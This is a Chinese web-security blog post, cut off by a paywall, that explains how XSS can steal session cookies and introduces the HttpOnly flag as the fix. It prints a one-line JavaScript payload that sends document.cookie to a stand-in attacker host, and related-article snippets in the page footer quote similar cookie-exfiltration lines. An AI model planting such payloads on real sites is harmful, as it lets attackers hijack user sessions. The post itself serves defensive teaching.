web开发安全之xss - cookie窃取

最新推荐文章于 2025-10-07 07:13:59 发布
原创 最新推荐文章于 2025-10-07 07:13:59 发布 · 578 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #安全 #xss

做为web开发者,我们知道;当我们登录一个网页系统的时候,服务器会写一些cookie到我们的浏览器里(php默认的是 PHPSESSID );来记录用户登录状态。

当下次再访问其它页面的时候,浏览器会自动传递此cookie。

服务器通过这个传递过来对应的cookie来判定用户身份,从而返回与此用户相关数据的页面。

然而,浏览器客户端脚本语言javascript是可以通过 document.cookie 来得到cookie的。

那么如果所在的系统,存在xss漏洞。被值入如下js代码段

var img = document.createElement('img');img.src = 'http://ooxx.com?c=' + encodeURIComponent(document.cookie);document.getElementsByTagName('body')[0].appendChild(img);


这样就会,你把用户的cookie窃取。以img标 src的请求方式,发送到操蛋者(http://ooxx.com)的服务器中记录下来(记录的方式,有很多种。其中最简单的。nginx 的access.log日志若开启了,便会记录下来)。
黑客,拿到你的cookie登录凭证,就可以用你的身份。搞破坏了。。。
 

那么为了应对防止web开发,防不胜防的xss漏洞;而导致登录凭证被窃取。

伟大的人类发觉了此问题的严重性,为了杜绝cookie登录凭证被获取。

于是想到了,那出的问题,从那着手。
不是就是由于js能够通过document.cookie来获取浏览器cookie吗?
那么我们就给cookie定下个标识。定了个协义,如果有此标识的cookie的,不允许js获取。这个标识就是我们常见的httponly

以php语言为例,设置cookie的httponly语法如下.
 

最低0.47元/天 解锁文章
【网络安全XSSCookie外带攻击姿势及例题详析
等风来
05-19 9332
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
XSS平台搭建及后台使用(cookie获取)
2302_79885863的博客
04-12 2644
点击XSS后台,这就是我们收集cookie的网站,第一次进入需要初始化,如果你的数据库密码改了的就要去靶场的根目录的pkxss/inc/config.inc.php把链接数据库密码改成一致(案列靶场是这个,反正就是要找到这个配置文件)执行完之做了一个php的重定向,做完上面操作,保存完数据库之后,重新给你访问了一下这个网址,这个网址应该改成存在漏洞的网站的IP。然后我们把留言删除,刚刚我们知识测试是否存在有这个漏洞,然后我们现在想要获取cookie,需要构造代码了。这里的IP是能和虚拟机通信的,
XSS漏洞利用(五)
qq_59611876的博客
12-17 1018
通过本文,了解Cookie以及利用XSS漏洞获取Cookie
[网络安全]XSSCookie外带攻击姿势详析
Hacker_LaoYi的博客
11-28 1694
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而。使用 onerror 事件的方式,在图片加载失败时触发一个错误事件,通过 window.open 方法打开了指定的攻击机地址,并传递cookie。执行后,服务器将启动并开始监听指定的 IP 地址和端口号,等待客户端连接。当用户访问包含恶意代码的页面时,会触发 XSS 攻击。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并。
网络攻击类型全解析:从原理到防御的实战指南
最新发布
huahua8088的博客
10-07 1094
根据FBI的IC3报告,2023年网络钓鱼攻击占所有网络犯罪的35%,造成超过100亿美元的损失。​:发送大量SYN包(建立连接的请求),但不回应ACK包——目标服务器会等待SYN-ACK超时,耗尽半连接队列。的漏洞(2023版),影响全球83%的Web应用(来源:OWASP Foundation)。​:半小时内收到127个用户的Cookie,其中3个是管理员——直接登录后台,下载了用户数据库。​:用户访问这个页面,输入账号密码后,会被重定向到真实支付宝,但密码已经发送到了我的服务器。
XSS小总结
孤的博客
10-02 600
原理 开发者在开发时,对客户端过滤严格,导致恶意的javascript代码在浏览器上执行 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的...
XSS-窃取Cookie
Jz031212的博客
07-23 351
打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去。步骤⼀:在以下⽹站注册账号并登陆,点击"创建项⽬"并填写项⽬名称...⽴即提交。:模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码。:此时回到平台上可看到其劫持的Cookie信息.点击查看 可以查看到其中的cookie字段。步骤⼆:在我的项⽬中选择我们刚创建的项⽬。步骤三:点击右上⻆的查看配置代码。复制script这⼀条代码。
利用XSS来将cookie传送指定文件中
Q1n6
09-23 938
题目可以说是很直白了,为什么突然写这个,还来源于前几天的面试,今年的校招因为一些公司的缩招,可以说是泥潭之争了,当然了,被面试官蹂躏也是自身水平和能力的限制,没有任何怨言。在面试官让我手写xss利用代码的时候,我才发现,因为一直以来的乙方的惯性思维,在漏洞利用和脚本上自己的实践太少了,但是还好,我还有很长很长的时间,可以努力。 在存在XSS漏洞的输入框中输入(IP地址为测试内网地址): d
精选资源
WEB渗透学习-XSS-labs靶场
04-20
6. **XSS攻击利用实战**:在高级关卡中,你可能需要利用XSS进行更复杂的操作,如cookie窃取、CSRF令牌篡改甚至会话劫持。 7. **安全编码实践**:靶场还会提供一些实际的编程案例,让你了解如何在开发过程中安全...
xss-labs靶场通关详解 XSS (Cross Site Scripting) 攻击是一种常见的网络攻击类型,它允许攻击者在受害者的浏览器中执行恶意脚本
04-17
xss-labs靶场通关详解 XSS (Cross...2. **Cookie窃取**:一旦能够成功执行JavaScript,就可以尝试读取用户的cookie并通过JavaScript将其发送到自己的服务器。例如:`document.location='http://yourserver.com/?cookie=
xss-labs-master.rar
05-09
XSS攻击可以实现多种目标,如窃取用户cookie、钓鱼欺诈、传播恶意软件等。常见的攻击手段包括: 1. Cookie盗窃:通过JavaScript读取并发送用户的登录cookie,实现身份冒充。 2. 钓鱼攻击:创建仿冒登录页面,诱导...
XSS漏洞】XSS攻击平台-窃取Cookie
muyuchen110的博客
07-23 982
XSS漏洞基础:XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSSXSS 是⼀种在 web 应⽤中的计算机安全漏洞,它允许恶意web⽤户将代码植⼊到 web ⽹站⾥⾯,供给其它⽤户访问,当⽤户访问到有恶意代码的⽹⻚就会产⽣ xss 攻击;漏洞概念:⽬标未对⽤户从前端功能点输⼊的数据与输出的内容未进⾏处理或者处理不当,从⽽导致恶意的JS代码被执⾏造成窃取⽤户信息劫持WEB⾏为危害的。
XSSCookie
公众号shadow sock7
12-03 993
payload: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection#exploit-code-or-poc XSS/grabber.php <?php // How to use it echo " <script>new Image().src=\&amp
XSS之存储型xss获取cookie试验(ajax方法)
qq_34847808的博客
06-13 4535
1、首先我写了个非常简易的留言板,没有做人任何安全处理,能使用存储型xss2、留言里写入能够发送请求的js代码,提交后服务器将代码存储到服务器中,用户访问的时候就会触发这段xss代码。让访问这个页面的用户能够发送一个请求并附带自己的cookie信息。3、第二步请求的目标主机上放置一个脚本用来接收这个请求然后保存在文本中具体步骤:一、登录我写的留言板,留言写入xss代码提交后页面显示如下:内容被被保...
网安入门17-XSS(打Cookie
m0_61499194的博客
02-27 1746
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie。接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台。反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie。查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接。实战打Cookie成功。
XSS获取Cookie过程简单演示
热门推荐
qq_36609913的博客
01-15 3万+
XSS: 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 本次演示将通过DVWA平台进行 实例: 打开
XSS攻击——cookie
qq_46277212的博客
06-23 2017
cookie概述 cookie是一些数据,存储于用户电脑上的文本文件中。当web服务器向浏览器发送web页面时,在连接关闭后,服务器不会记录用户的信息。cookie的作用就是用于解决“如何记录客户端的用户信息”。 当用户访问web页面时,用户名可以记录在cookie中。 在用户下一次访问该页面时,可以在cookie中读取用户访问记录。 cookie以键值对形式存储。如 username=baixiaomao; 当浏览器从服务器上请求web页面时,属于该页面的cookie会被添加到该请求中。服务器端通过
简单的利用XSS获取用户cookie
shy的博客
10-25 4693
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 2892
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
Web开发中的XSS安全风险与防范
Web开发中,安全是一个至关重要的考虑因素,尤其是针对XSS(跨站脚本攻击)。XSS攻击是由于开发者对这种威胁的忽视而变得尤为危险。它并不在于解决的难度,而在于如何提高开发者的安全意识。XSS攻击可以通过在网页...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值